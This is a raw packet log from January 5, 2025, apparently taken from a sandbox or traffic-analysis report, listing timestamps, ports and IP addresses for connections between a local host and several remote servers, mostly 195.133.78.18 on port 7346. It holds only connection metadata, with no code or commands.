Jan 5, 2025 08:32:25.295063972 CET	7346	49742	195.133.78.18	192.168.2.4
Jan 5, 2025 08:32:25.295077085 CET	7346	49742	195.133.78.18	192.168.2.4
Jan 5, 2025 08:32:25.295125961 CET	49742	7346	192.168.2.4	195.133.78.18
Jan 5, 2025 08:32:25.295177937 CET	7346	49742	195.133.78.18	192.168.2.4
Jan 5, 2025 08:32:25.295190096 CET	7346	49742	195.133.78.18	192.168.2.4
Jan 5, 2025 08:32:25.295201063 CET	7346	49742	195.133.78.18	192.168.2.4
Jan 5, 2025 08:32:25.295254946 CET	7346	49742	195.133.78.18	192.168.2.4
Jan 5, 2025 08:32:25.295259953 CET	49742	7346	192.168.2.4	195.133.78.18
Jan 5, 2025 08:32:25.295356035 CET	7346	49742	195.133.78.18	192.168.2.4
Jan 5, 2025 08:32:25.295367002 CET	7346	49742	195.133.78.18	192.168.2.4
Jan 5, 2025 08:32:25.295429945 CET	49742	7346	192.168.2.4	195.133.78.18
Jan 5, 2025 08:32:25.295494080 CET	7346	49742	195.133.78.18	192.168.2.4
Jan 5, 2025 08:32:25.295506001 CET	7346	49742	195.133.78.18	192.168.2.4
Jan 5, 2025 08:32:25.295516968 CET	7346	49742	195.133.78.18	192.168.2.4
Jan 5, 2025 08:32:25.295528889 CET	7346	49742	195.133.78.18	192.168.2.4
Jan 5, 2025 08:32:25.295569897 CET	49742	7346	192.168.2.4	195.133.78.18
Jan 5, 2025 08:32:25.295569897 CET	49742	7346	192.168.2.4	195.133.78.18
Jan 5, 2025 08:32:25.295667887 CET	7346	49742	195.133.78.18	192.168.2.4
Jan 5, 2025 08:32:25.295679092 CET	7346	49742	195.133.78.18	192.168.2.4
Jan 5, 2025 08:32:25.295689106 CET	7346	49742	195.133.78.18	192.168.2.4
Jan 5, 2025 08:32:25.295713902 CET	49742	7346	192.168.2.4	195.133.78.18
Jan 5, 2025 08:32:25.295775890 CET	7346	49742	195.133.78.18	192.168.2.4
Jan 5, 2025 08:32:25.295799017 CET	7346	49742	195.133.78.18	192.168.2.4
Jan 5, 2025 08:32:25.295815945 CET	7346	49742	195.133.78.18	192.168.2.4
Jan 5, 2025 08:32:25.295833111 CET	49742	7346	192.168.2.4	195.133.78.18
Jan 5, 2025 08:32:25.295870066 CET	49742	7346	192.168.2.4	195.133.78.18
Jan 5, 2025 08:32:25.295994997 CET	7346	49742	195.133.78.18	192.168.2.4
Jan 5, 2025 08:32:25.296006918 CET	7346	49742	195.133.78.18	192.168.2.4
Jan 5, 2025 08:32:25.296016932 CET	7346	49742	195.133.78.18	192.168.2.4
Jan 5, 2025 08:32:25.296027899 CET	7346	49742	195.133.78.18	192.168.2.4
Jan 5, 2025 08:32:25.296061039 CET	49742	7346	192.168.2.4	195.133.78.18
Jan 5, 2025 08:32:25.296061039 CET	49742	7346	192.168.2.4	195.133.78.18
Jan 5, 2025 08:32:25.296181917 CET	7346	49742	195.133.78.18	192.168.2.4
Jan 5, 2025 08:32:25.296194077 CET	7346	49742	195.133.78.18	192.168.2.4
Jan 5, 2025 08:32:25.296228886 CET	7346	49742	195.133.78.18	192.168.2.4
Jan 5, 2025 08:32:25.296241999 CET	7346	49742	195.133.78.18	192.168.2.4
Jan 5, 2025 08:32:25.296247959 CET	49742	7346	192.168.2.4	195.133.78.18
Jan 5, 2025 08:32:25.296289921 CET	49742	7346	192.168.2.4	195.133.78.18
Jan 5, 2025 08:32:25.296441078 CET	7346	49742	195.133.78.18	192.168.2.4
Jan 5, 2025 08:32:25.296495914 CET	7346	49742	195.133.78.18	192.168.2.4
Jan 5, 2025 08:32:25.296505928 CET	7346	49742	195.133.78.18	192.168.2.4
Jan 5, 2025 08:32:25.296561956 CET	49742	7346	192.168.2.4	195.133.78.18
Jan 5, 2025 08:32:25.296638966 CET	7346	49742	195.133.78.18	192.168.2.4
Jan 5, 2025 08:32:25.296649933 CET	7346	49742	195.133.78.18	192.168.2.4
Jan 5, 2025 08:32:25.296659946 CET	7346	49742	195.133.78.18	192.168.2.4
Jan 5, 2025 08:32:25.296669960 CET	7346	49742	195.133.78.18	192.168.2.4
Jan 5, 2025 08:32:25.296700954 CET	49742	7346	192.168.2.4	195.133.78.18
Jan 5, 2025 08:32:25.296700954 CET	49742	7346	192.168.2.4	195.133.78.18
Jan 5, 2025 08:32:25.296849012 CET	7346	49742	195.133.78.18	192.168.2.4
Jan 5, 2025 08:32:25.296859026 CET	7346	49742	195.133.78.18	192.168.2.4
Jan 5, 2025 08:32:25.296869040 CET	7346	49742	195.133.78.18	192.168.2.4
Jan 5, 2025 08:32:25.296885014 CET	7346	49742	195.133.78.18	192.168.2.4
Jan 5, 2025 08:32:25.296895027 CET	7346	49742	195.133.78.18	192.168.2.4
Jan 5, 2025 08:32:25.296906948 CET	49742	7346	192.168.2.4	195.133.78.18
Jan 5, 2025 08:32:25.296906948 CET	49742	7346	192.168.2.4	195.133.78.18
Jan 5, 2025 08:32:25.296981096 CET	49742	7346	192.168.2.4	195.133.78.18
Jan 5, 2025 08:32:25.297069073 CET	7346	49742	195.133.78.18	192.168.2.4
Jan 5, 2025 08:32:25.297079086 CET	7346	49742	195.133.78.18	192.168.2.4
Jan 5, 2025 08:32:25.297089100 CET	7346	49742	195.133.78.18	192.168.2.4
Jan 5, 2025 08:32:25.297133923 CET	49742	7346	192.168.2.4	195.133.78.18
Jan 5, 2025 08:32:25.297446966 CET	7346	49742	195.133.78.18	192.168.2.4
Jan 5, 2025 08:32:25.297457933 CET	7346	49742	195.133.78.18	192.168.2.4
Jan 5, 2025 08:32:25.297468901 CET	7346	49742	195.133.78.18	192.168.2.4
Jan 5, 2025 08:32:25.297497034 CET	49742	7346	192.168.2.4	195.133.78.18
Jan 5, 2025 08:32:25.297522068 CET	49742	7346	192.168.2.4	195.133.78.18
Jan 5, 2025 08:32:25.297543049 CET	7346	49742	195.133.78.18	192.168.2.4
Jan 5, 2025 08:32:25.297554970 CET	7346	49742	195.133.78.18	192.168.2.4
Jan 5, 2025 08:32:25.297569990 CET	7346	49742	195.133.78.18	192.168.2.4
Jan 5, 2025 08:32:25.297581911 CET	7346	49742	195.133.78.18	192.168.2.4
Jan 5, 2025 08:32:25.297614098 CET	49742	7346	192.168.2.4	195.133.78.18
Jan 5, 2025 08:32:25.297650099 CET	49742	7346	192.168.2.4	195.133.78.18
Jan 5, 2025 08:32:25.297842979 CET	7346	49742	195.133.78.18	192.168.2.4
Jan 5, 2025 08:32:25.297853947 CET	7346	49742	195.133.78.18	192.168.2.4
Jan 5, 2025 08:32:25.297864914 CET	7346	49742	195.133.78.18	192.168.2.4
Jan 5, 2025 08:32:25.297874928 CET	7346	49742	195.133.78.18	192.168.2.4
Jan 5, 2025 08:32:25.297885895 CET	7346	49742	195.133.78.18	192.168.2.4
Jan 5, 2025 08:32:25.297895908 CET	7346	49742	195.133.78.18	192.168.2.4
Jan 5, 2025 08:32:25.297905922 CET	7346	49742	195.133.78.18	192.168.2.4
Jan 5, 2025 08:32:25.297908068 CET	49742	7346	192.168.2.4	195.133.78.18
Jan 5, 2025 08:32:25.297918081 CET	7346	49742	195.133.78.18	192.168.2.4
Jan 5, 2025 08:32:25.297935009 CET	49742	7346	192.168.2.4	195.133.78.18
Jan 5, 2025 08:32:25.297935009 CET	49742	7346	192.168.2.4	195.133.78.18
Jan 5, 2025 08:32:25.297952890 CET	49742	7346	192.168.2.4	195.133.78.18
Jan 5, 2025 08:32:25.298294067 CET	7346	49742	195.133.78.18	192.168.2.4
Jan 5, 2025 08:32:25.298342943 CET	7346	49742	195.133.78.18	192.168.2.4
Jan 5, 2025 08:32:25.298352957 CET	7346	49742	195.133.78.18	192.168.2.4
Jan 5, 2025 08:32:25.298393965 CET	49742	7346	192.168.2.4	195.133.78.18
Jan 5, 2025 08:32:25.333571911 CET	7346	49742	195.133.78.18	192.168.2.4
Jan 5, 2025 08:32:25.333728075 CET	7346	49742	195.133.78.18	192.168.2.4
Jan 5, 2025 08:32:25.333736897 CET	49742	7346	192.168.2.4	195.133.78.18
Jan 5, 2025 08:32:25.333738089 CET	7346	49742	195.133.78.18	192.168.2.4
Jan 5, 2025 08:32:25.333751917 CET	7346	49742	195.133.78.18	192.168.2.4
Jan 5, 2025 08:32:25.333771944 CET	49742	7346	192.168.2.4	195.133.78.18
Jan 5, 2025 08:32:25.333838940 CET	7346	49742	195.133.78.18	192.168.2.4
Jan 5, 2025 08:32:25.333853960 CET	7346	49742	195.133.78.18	192.168.2.4
Jan 5, 2025 08:32:25.333863974 CET	7346	49742	195.133.78.18	192.168.2.4
Jan 5, 2025 08:32:25.333873987 CET	7346	49742	195.133.78.18	192.168.2.4
Jan 5, 2025 08:32:25.333887100 CET	7346	49742	195.133.78.18	192.168.2.4
Jan 5, 2025 08:32:25.333893061 CET	49742	7346	192.168.2.4	195.133.78.18
Jan 5, 2025 08:32:25.333910942 CET	49742	7346	192.168.2.4	195.133.78.18
Jan 5, 2025 08:32:25.333931923 CET	49742	7346	192.168.2.4	195.133.78.18
Jan 5, 2025 08:32:25.333996058 CET	7346	49742	195.133.78.18	192.168.2.4
Jan 5, 2025 08:32:25.334011078 CET	7346	49742	195.133.78.18	192.168.2.4
Jan 5, 2025 08:32:25.334022045 CET	7346	49742	195.133.78.18	192.168.2.4
Jan 5, 2025 08:32:25.334048986 CET	49742	7346	192.168.2.4	195.133.78.18
Jan 5, 2025 08:32:25.334119081 CET	7346	49742	195.133.78.18	192.168.2.4
Jan 5, 2025 08:32:25.334160089 CET	49742	7346	192.168.2.4	195.133.78.18
Jan 5, 2025 08:32:25.334192038 CET	7346	49742	195.133.78.18	192.168.2.4
Jan 5, 2025 08:32:25.334204912 CET	7346	49742	195.133.78.18	192.168.2.4
Jan 5, 2025 08:32:25.334275961 CET	49742	7346	192.168.2.4	195.133.78.18
Jan 5, 2025 08:32:25.334310055 CET	7346	49742	195.133.78.18	192.168.2.4
Jan 5, 2025 08:32:25.334321976 CET	7346	49742	195.133.78.18	192.168.2.4
Jan 5, 2025 08:32:25.334378004 CET	49742	7346	192.168.2.4	195.133.78.18
Jan 5, 2025 08:32:25.334378958 CET	7346	49742	195.133.78.18	192.168.2.4
Jan 5, 2025 08:32:25.334389925 CET	7346	49742	195.133.78.18	192.168.2.4
Jan 5, 2025 08:32:25.334434986 CET	49742	7346	192.168.2.4	195.133.78.18
Jan 5, 2025 08:32:25.334475040 CET	7346	49742	195.133.78.18	192.168.2.4
Jan 5, 2025 08:32:25.334486961 CET	7346	49742	195.133.78.18	192.168.2.4
Jan 5, 2025 08:32:25.334496975 CET	7346	49742	195.133.78.18	192.168.2.4
Jan 5, 2025 08:32:25.334536076 CET	49742	7346	192.168.2.4	195.133.78.18
Jan 5, 2025 08:32:25.343115091 CET	7346	49742	195.133.78.18	192.168.2.4
Jan 5, 2025 08:32:25.343167067 CET	7346	49742	195.133.78.18	192.168.2.4
Jan 5, 2025 08:32:25.343170881 CET	49742	7346	192.168.2.4	195.133.78.18
Jan 5, 2025 08:32:25.343178034 CET	7346	49742	195.133.78.18	192.168.2.4
Jan 5, 2025 08:32:25.343319893 CET	7346	49742	195.133.78.18	192.168.2.4
Jan 5, 2025 08:32:25.343342066 CET	7346	49742	195.133.78.18	192.168.2.4
Jan 5, 2025 08:32:25.343358040 CET	7346	49742	195.133.78.18	192.168.2.4
Jan 5, 2025 08:32:25.343368053 CET	7346	49742	195.133.78.18	192.168.2.4
Jan 5, 2025 08:32:25.343375921 CET	49742	7346	192.168.2.4	195.133.78.18
Jan 5, 2025 08:32:25.343379021 CET	7346	49742	195.133.78.18	192.168.2.4
Jan 5, 2025 08:32:25.343395948 CET	49742	7346	192.168.2.4	195.133.78.18
Jan 5, 2025 08:32:25.343414068 CET	49742	7346	192.168.2.4	195.133.78.18
Jan 5, 2025 08:32:25.343579054 CET	7346	49742	195.133.78.18	192.168.2.4
Jan 5, 2025 08:32:25.343590975 CET	7346	49742	195.133.78.18	192.168.2.4
Jan 5, 2025 08:32:25.343600988 CET	7346	49742	195.133.78.18	192.168.2.4
Jan 5, 2025 08:32:25.343606949 CET	7346	49742	195.133.78.18	192.168.2.4
Jan 5, 2025 08:32:25.343632936 CET	49742	7346	192.168.2.4	195.133.78.18
Jan 5, 2025 08:32:25.343681097 CET	49742	7346	192.168.2.4	195.133.78.18
Jan 5, 2025 08:32:25.343725920 CET	7346	49742	195.133.78.18	192.168.2.4
Jan 5, 2025 08:32:25.343736887 CET	7346	49742	195.133.78.18	192.168.2.4
Jan 5, 2025 08:32:25.343760014 CET	49742	7346	192.168.2.4	195.133.78.18
Jan 5, 2025 08:32:25.352777004 CET	7346	49742	195.133.78.18	192.168.2.4
Jan 5, 2025 08:32:25.352809906 CET	7346	49742	195.133.78.18	192.168.2.4
Jan 5, 2025 08:32:25.352821112 CET	7346	49742	195.133.78.18	192.168.2.4
Jan 5, 2025 08:32:25.352845907 CET	49742	7346	192.168.2.4	195.133.78.18
Jan 5, 2025 08:32:25.352874041 CET	49742	7346	192.168.2.4	195.133.78.18
Jan 5, 2025 08:32:25.352919102 CET	7346	49742	195.133.78.18	192.168.2.4
Jan 5, 2025 08:32:25.352930069 CET	7346	49742	195.133.78.18	192.168.2.4
Jan 5, 2025 08:32:25.352965117 CET	49742	7346	192.168.2.4	195.133.78.18
Jan 5, 2025 08:32:25.353024960 CET	7346	49742	195.133.78.18	192.168.2.4
Jan 5, 2025 08:32:25.353037119 CET	7346	49742	195.133.78.18	192.168.2.4
Jan 5, 2025 08:32:25.353087902 CET	49742	7346	192.168.2.4	195.133.78.18
Jan 5, 2025 08:32:25.353156090 CET	7346	49742	195.133.78.18	192.168.2.4
Jan 5, 2025 08:32:25.353167057 CET	7346	49742	195.133.78.18	192.168.2.4
Jan 5, 2025 08:32:25.353177071 CET	7346	49742	195.133.78.18	192.168.2.4
Jan 5, 2025 08:32:25.353198051 CET	7346	49742	195.133.78.18	192.168.2.4
Jan 5, 2025 08:32:25.353199959 CET	49742	7346	192.168.2.4	195.133.78.18
Jan 5, 2025 08:32:25.353214979 CET	7346	49742	195.133.78.18	192.168.2.4
Jan 5, 2025 08:32:25.353260994 CET	49742	7346	192.168.2.4	195.133.78.18
Jan 5, 2025 08:32:25.353369951 CET	7346	49742	195.133.78.18	192.168.2.4
Jan 5, 2025 08:32:25.353380919 CET	7346	49742	195.133.78.18	192.168.2.4
Jan 5, 2025 08:32:25.353452921 CET	49742	7346	192.168.2.4	195.133.78.18
Jan 5, 2025 08:32:25.382088900 CET	7346	49742	195.133.78.18	192.168.2.4
Jan 5, 2025 08:32:25.382102013 CET	7346	49742	195.133.78.18	192.168.2.4
Jan 5, 2025 08:32:25.382112026 CET	7346	49742	195.133.78.18	192.168.2.4
Jan 5, 2025 08:32:25.382144928 CET	49742	7346	192.168.2.4	195.133.78.18
Jan 5, 2025 08:32:25.382144928 CET	49742	7346	192.168.2.4	195.133.78.18
Jan 5, 2025 08:32:25.382149935 CET	7346	49742	195.133.78.18	192.168.2.4
Jan 5, 2025 08:32:25.382224083 CET	7346	49742	195.133.78.18	192.168.2.4
Jan 5, 2025 08:32:25.382235050 CET	7346	49742	195.133.78.18	192.168.2.4
Jan 5, 2025 08:32:25.382253885 CET	49742	7346	192.168.2.4	195.133.78.18
Jan 5, 2025 08:32:25.382308006 CET	7346	49742	195.133.78.18	192.168.2.4
Jan 5, 2025 08:32:25.382318974 CET	7346	49742	195.133.78.18	192.168.2.4
Jan 5, 2025 08:32:25.382384062 CET	49742	7346	192.168.2.4	195.133.78.18
Jan 5, 2025 08:32:25.382409096 CET	7346	49742	195.133.78.18	192.168.2.4
Jan 5, 2025 08:32:25.382421017 CET	7346	49742	195.133.78.18	192.168.2.4
Jan 5, 2025 08:32:25.382491112 CET	49742	7346	192.168.2.4	195.133.78.18
Jan 5, 2025 08:32:25.382561922 CET	7346	49742	195.133.78.18	192.168.2.4
Jan 5, 2025 08:32:25.382572889 CET	7346	49742	195.133.78.18	192.168.2.4
Jan 5, 2025 08:32:25.382581949 CET	7346	49742	195.133.78.18	192.168.2.4
Jan 5, 2025 08:32:25.382610083 CET	49742	7346	192.168.2.4	195.133.78.18
Jan 5, 2025 08:32:25.382632971 CET	49742	7346	192.168.2.4	195.133.78.18
Jan 5, 2025 08:32:25.382700920 CET	7346	49742	195.133.78.18	192.168.2.4
Jan 5, 2025 08:32:25.382714987 CET	7346	49742	195.133.78.18	192.168.2.4
Jan 5, 2025 08:32:25.382725000 CET	7346	49742	195.133.78.18	192.168.2.4
Jan 5, 2025 08:32:25.382792950 CET	49742	7346	192.168.2.4	195.133.78.18
Jan 5, 2025 08:32:25.382827997 CET	7346	49742	195.133.78.18	192.168.2.4
Jan 5, 2025 08:32:25.382838011 CET	7346	49742	195.133.78.18	192.168.2.4
Jan 5, 2025 08:32:25.382848978 CET	7346	49742	195.133.78.18	192.168.2.4
Jan 5, 2025 08:32:25.382859945 CET	7346	49742	195.133.78.18	192.168.2.4
Jan 5, 2025 08:32:25.382869005 CET	49742	7346	192.168.2.4	195.133.78.18
Jan 5, 2025 08:32:25.382894039 CET	49742	7346	192.168.2.4	195.133.78.18
Jan 5, 2025 08:32:25.383049965 CET	7346	49742	195.133.78.18	192.168.2.4
Jan 5, 2025 08:32:25.383060932 CET	7346	49742	195.133.78.18	192.168.2.4
Jan 5, 2025 08:32:25.383071899 CET	7346	49742	195.133.78.18	192.168.2.4
Jan 5, 2025 08:32:25.383109093 CET	49742	7346	192.168.2.4	195.133.78.18
Jan 5, 2025 08:32:25.383109093 CET	49742	7346	192.168.2.4	195.133.78.18
Jan 5, 2025 08:32:25.383177996 CET	7346	49742	195.133.78.18	192.168.2.4
Jan 5, 2025 08:32:25.383188963 CET	7346	49742	195.133.78.18	192.168.2.4
Jan 5, 2025 08:32:25.383198977 CET	7346	49742	195.133.78.18	192.168.2.4
Jan 5, 2025 08:32:25.383208990 CET	7346	49742	195.133.78.18	192.168.2.4
Jan 5, 2025 08:32:25.383249044 CET	49742	7346	192.168.2.4	195.133.78.18
Jan 5, 2025 08:32:25.383249044 CET	49742	7346	192.168.2.4	195.133.78.18
Jan 5, 2025 08:32:25.383410931 CET	7346	49742	195.133.78.18	192.168.2.4
Jan 5, 2025 08:32:25.383420944 CET	7346	49742	195.133.78.18	192.168.2.4
Jan 5, 2025 08:32:25.383430958 CET	7346	49742	195.133.78.18	192.168.2.4
Jan 5, 2025 08:32:25.383493900 CET	7346	49742	195.133.78.18	192.168.2.4
Jan 5, 2025 08:32:25.383496046 CET	49742	7346	192.168.2.4	195.133.78.18
Jan 5, 2025 08:32:25.383510113 CET	7346	49742	195.133.78.18	192.168.2.4
Jan 5, 2025 08:32:25.383521080 CET	7346	49742	195.133.78.18	192.168.2.4
Jan 5, 2025 08:32:25.383544922 CET	49742	7346	192.168.2.4	195.133.78.18
Jan 5, 2025 08:32:25.383577108 CET	49742	7346	192.168.2.4	195.133.78.18
Jan 5, 2025 08:32:25.383709908 CET	7346	49742	195.133.78.18	192.168.2.4
Jan 5, 2025 08:32:25.383722067 CET	7346	49742	195.133.78.18	192.168.2.4
Jan 5, 2025 08:32:25.383732080 CET	7346	49742	195.133.78.18	192.168.2.4
Jan 5, 2025 08:32:25.383740902 CET	7346	49742	195.133.78.18	192.168.2.4
Jan 5, 2025 08:32:25.383750916 CET	7346	49742	195.133.78.18	192.168.2.4
Jan 5, 2025 08:32:25.383758068 CET	49742	7346	192.168.2.4	195.133.78.18
Jan 5, 2025 08:32:25.383761883 CET	7346	49742	195.133.78.18	192.168.2.4
Jan 5, 2025 08:32:25.383773088 CET	7346	49742	195.133.78.18	192.168.2.4
Jan 5, 2025 08:32:25.383780003 CET	49742	7346	192.168.2.4	195.133.78.18
Jan 5, 2025 08:32:25.383816957 CET	49742	7346	192.168.2.4	195.133.78.18
Jan 5, 2025 08:32:25.384051085 CET	7346	49742	195.133.78.18	192.168.2.4
Jan 5, 2025 08:32:25.384063005 CET	7346	49742	195.133.78.18	192.168.2.4
Jan 5, 2025 08:32:25.384073019 CET	7346	49742	195.133.78.18	192.168.2.4
Jan 5, 2025 08:32:25.384099007 CET	49742	7346	192.168.2.4	195.133.78.18
Jan 5, 2025 08:32:25.384140015 CET	49742	7346	192.168.2.4	195.133.78.18
Jan 5, 2025 08:32:25.420419931 CET	7346	49742	195.133.78.18	192.168.2.4
Jan 5, 2025 08:32:25.420432091 CET	7346	49742	195.133.78.18	192.168.2.4
Jan 5, 2025 08:32:25.420488119 CET	49742	7346	192.168.2.4	195.133.78.18
Jan 5, 2025 08:32:25.949398994 CET	80	49743	178.237.33.50	192.168.2.4
Jan 5, 2025 08:32:25.949469090 CET	49743	80	192.168.2.4	178.237.33.50
Jan 5, 2025 08:32:27.715953112 CET	49742	7346	192.168.2.4	195.133.78.18
Jan 5, 2025 08:32:27.720866919 CET	7346	49742	195.133.78.18	192.168.2.4
Jan 5, 2025 08:32:27.720905066 CET	7346	49742	195.133.78.18	192.168.2.4
Jan 5, 2025 08:32:27.720927954 CET	49742	7346	192.168.2.4	195.133.78.18
Jan 5, 2025 08:32:27.720933914 CET	7346	49742	195.133.78.18	192.168.2.4
Jan 5, 2025 08:32:27.720944881 CET	49742	7346	192.168.2.4	195.133.78.18
Jan 5, 2025 08:32:27.720948935 CET	7346	49742	195.133.78.18	192.168.2.4
Jan 5, 2025 08:32:27.720997095 CET	7346	49742	195.133.78.18	192.168.2.4
Jan 5, 2025 08:32:27.721004963 CET	7346	49742	195.133.78.18	192.168.2.4
Jan 5, 2025 08:32:27.721009970 CET	49742	7346	192.168.2.4	195.133.78.18
Jan 5, 2025 08:32:27.721014977 CET	7346	49742	195.133.78.18	192.168.2.4
Jan 5, 2025 08:32:27.721139908 CET	7346	49742	195.133.78.18	192.168.2.4
Jan 5, 2025 08:32:27.721148014 CET	7346	49742	195.133.78.18	192.168.2.4
Jan 5, 2025 08:32:27.721157074 CET	7346	49742	195.133.78.18	192.168.2.4
Jan 5, 2025 08:32:27.725734949 CET	7346	49742	195.133.78.18	192.168.2.4
Jan 5, 2025 08:32:27.725744009 CET	7346	49742	195.133.78.18	192.168.2.4
Jan 5, 2025 08:32:27.725776911 CET	7346	49742	195.133.78.18	192.168.2.4
Jan 5, 2025 08:32:27.725786924 CET	7346	49742	195.133.78.18	192.168.2.4
Jan 5, 2025 08:32:27.725832939 CET	7346	49742	195.133.78.18	192.168.2.4
Jan 5, 2025 08:32:27.725841999 CET	7346	49742	195.133.78.18	192.168.2.4
Jan 5, 2025 08:32:27.726073027 CET	7346	49742	195.133.78.18	192.168.2.4
Jan 5, 2025 08:32:27.726151943 CET	49742	7346	192.168.2.4	195.133.78.18
Jan 5, 2025 08:32:31.193233967 CET	49746	443	192.168.2.4	188.114.96.3
Jan 5, 2025 08:32:31.193275928 CET	443	49746	188.114.96.3	192.168.2.4
Jan 5, 2025 08:32:31.197393894 CET	49746	443	192.168.2.4	188.114.96.3
Jan 5, 2025 08:32:31.245237112 CET	49746	443	192.168.2.4	188.114.96.3
Jan 5, 2025 08:32:31.245256901 CET	443	49746	188.114.96.3	192.168.2.4
Jan 5, 2025 08:32:31.701539993 CET	443	49746	188.114.96.3	192.168.2.4
Jan 5, 2025 08:32:31.701704025 CET	49746	443	192.168.2.4	188.114.96.3
Jan 5, 2025 08:32:31.710270882 CET	49746	443	192.168.2.4	188.114.96.3
Jan 5, 2025 08:32:31.710283995 CET	443	49746	188.114.96.3	192.168.2.4
Jan 5, 2025 08:32:31.710521936 CET	443	49746	188.114.96.3	192.168.2.4
Jan 5, 2025 08:32:31.710627079 CET	49746	443	192.168.2.4	188.114.96.3
Jan 5, 2025 08:32:31.713212013 CET	49746	443	192.168.2.4	188.114.96.3
Jan 5, 2025 08:32:31.755335093 CET	443	49746	188.114.96.3	192.168.2.4
Jan 5, 2025 08:32:31.947467089 CET	443	49746	188.114.96.3	192.168.2.4
Jan 5, 2025 08:32:31.947540998 CET	443	49746	188.114.96.3	192.168.2.4
Jan 5, 2025 08:32:31.947587967 CET	443	49746	188.114.96.3	192.168.2.4
Jan 5, 2025 08:32:31.947633982 CET	49746	443	192.168.2.4	188.114.96.3
Jan 5, 2025 08:32:31.947644949 CET	443	49746	188.114.96.3	192.168.2.4
Jan 5, 2025 08:32:31.947686911 CET	49746	443	192.168.2.4	188.114.96.3
Jan 5, 2025 08:32:31.947968006 CET	443	49746	188.114.96.3	192.168.2.4
Jan 5, 2025 08:32:31.948055983 CET	443	49746	188.114.96.3	192.168.2.4
Jan 5, 2025 08:32:31.948084116 CET	49746	443	192.168.2.4	188.114.96.3
Jan 5, 2025 08:32:31.948172092 CET	49746	443	192.168.2.4	188.114.96.3
Jan 5, 2025 08:32:31.950284004 CET	49746	443	192.168.2.4	188.114.96.3
Jan 5, 2025 08:32:31.950318098 CET	443	49746	188.114.96.3	192.168.2.4
Jan 5, 2025 08:32:33.535404921 CET	7346	49739	195.133.78.18	192.168.2.4
Jan 5, 2025 08:32:33.537251949 CET	49739	7346	192.168.2.4	195.133.78.18
Jan 5, 2025 08:32:33.542098999 CET	7346	49739	195.133.78.18	192.168.2.4
Jan 5, 2025 08:32:39.982779980 CET	49761	443	192.168.2.4	142.250.186.97
Jan 5, 2025 08:32:39.982805014 CET	443	49761	142.250.186.97	192.168.2.4
Jan 5, 2025 08:32:39.982872009 CET	49761	443	192.168.2.4	142.250.186.97
Jan 5, 2025 08:32:39.983028889 CET	49761	443	192.168.2.4	142.250.186.97
Jan 5, 2025 08:32:39.983042002 CET	443	49761	142.250.186.97	192.168.2.4
Jan 5, 2025 08:32:40.389394999 CET	49764	443	192.168.2.4	162.159.61.3
Jan 5, 2025 08:32:40.389448881 CET	443	49764	162.159.61.3	192.168.2.4
Jan 5, 2025 08:32:40.389893055 CET	49764	443	192.168.2.4	162.159.61.3
Jan 5, 2025 08:32:40.390330076 CET	49764	443	192.168.2.4	162.159.61.3
Jan 5, 2025 08:32:40.390347958 CET	443	49764	162.159.61.3	192.168.2.4
Jan 5, 2025 08:32:40.392754078 CET	49765	443	192.168.2.4	172.64.41.3
Jan 5, 2025 08:32:40.392782927 CET	443	49765	172.64.41.3	192.168.2.4
Jan 5, 2025 08:32:40.392910004 CET	49765	443	192.168.2.4	172.64.41.3
Jan 5, 2025 08:32:40.393126011 CET	49765	443	192.168.2.4	172.64.41.3
Jan 5, 2025 08:32:40.393141031 CET	443	49765	172.64.41.3	192.168.2.4
Jan 5, 2025 08:32:40.729181051 CET	49766	443	192.168.2.4	172.64.41.3
Jan 5, 2025 08:32:40.729229927 CET	443	49766	172.64.41.3	192.168.2.4
Jan 5, 2025 08:32:40.730844021 CET	49766	443	192.168.2.4	172.64.41.3
Jan 5, 2025 08:32:40.731323004 CET	443	49761	142.250.186.97	192.168.2.4
Jan 5, 2025 08:32:40.731900930 CET	49766	443	192.168.2.4	172.64.41.3
Jan 5, 2025 08:32:40.731906891 CET	49761	443	192.168.2.4	142.250.186.97
Jan 5, 2025 08:32:40.731916904 CET	443	49766	172.64.41.3	192.168.2.4
Jan 5, 2025 08:32:40.731916904 CET	443	49761	142.250.186.97	192.168.2.4
Jan 5, 2025 08:32:40.732317924 CET	443	49761	142.250.186.97	192.168.2.4
Jan 5, 2025 08:32:40.732332945 CET	443	49761	142.250.186.97	192.168.2.4
Jan 5, 2025 08:32:40.732465982 CET	49761	443	192.168.2.4	142.250.186.97
Jan 5, 2025 08:32:40.732482910 CET	443	49761	142.250.186.97	192.168.2.4
Jan 5, 2025 08:32:40.732649088 CET	49761	443	192.168.2.4	142.250.186.97
Jan 5, 2025 08:32:40.733052969 CET	443	49761	142.250.186.97	192.168.2.4
Jan 5, 2025 08:32:40.735107899 CET	49761	443	192.168.2.4	142.250.186.97
Jan 5, 2025 08:32:40.735194921 CET	443	49761	142.250.186.97	192.168.2.4
Jan 5, 2025 08:32:40.735404968 CET	49761	443	192.168.2.4	142.250.186.97
Jan 5, 2025 08:32:40.735414028 CET	443	49761	142.250.186.97	192.168.2.4
Jan 5, 2025 08:32:40.846940041 CET	443	49764	162.159.61.3	192.168.2.4
Jan 5, 2025 08:32:40.847352028 CET	49764	443	192.168.2.4	162.159.61.3
Jan 5, 2025 08:32:40.847384930 CET	443	49764	162.159.61.3	192.168.2.4
Jan 5, 2025 08:32:40.848413944 CET	443	49764	162.159.61.3	192.168.2.4
Jan 5, 2025 08:32:40.848530054 CET	49764	443	192.168.2.4	162.159.61.3
Jan 5, 2025 08:32:40.849276066 CET	443	49765	172.64.41.3	192.168.2.4
Jan 5, 2025 08:32:40.850004911 CET	49764	443	192.168.2.4	162.159.61.3
Jan 5, 2025 08:32:40.850071907 CET	443	49764	162.159.61.3	192.168.2.4
Jan 5, 2025 08:32:40.850311041 CET	49764	443	192.168.2.4	162.159.61.3
Jan 5, 2025 08:32:40.850321054 CET	443	49764	162.159.61.3	192.168.2.4
Jan 5, 2025 08:32:40.850596905 CET	49765	443	192.168.2.4	172.64.41.3
Jan 5, 2025 08:32:40.850616932 CET	443	49765	172.64.41.3	192.168.2.4
Jan 5, 2025 08:32:40.852092981 CET	443	49765	172.64.41.3	192.168.2.4
Jan 5, 2025 08:32:40.852247953 CET	49765	443	192.168.2.4	172.64.41.3
Jan 5, 2025 08:32:40.859700918 CET	49765	443	192.168.2.4	172.64.41.3
Jan 5, 2025 08:32:40.859700918 CET	49765	443	192.168.2.4	172.64.41.3
Jan 5, 2025 08:32:40.859790087 CET	443	49765	172.64.41.3	192.168.2.4
Jan 5, 2025 08:32:40.886600018 CET	49761	443	192.168.2.4	142.250.186.97
Jan 5, 2025 08:32:40.979413986 CET	443	49764	162.159.61.3	192.168.2.4
Jan 5, 2025 08:32:40.979518890 CET	49764	443	192.168.2.4	162.159.61.3
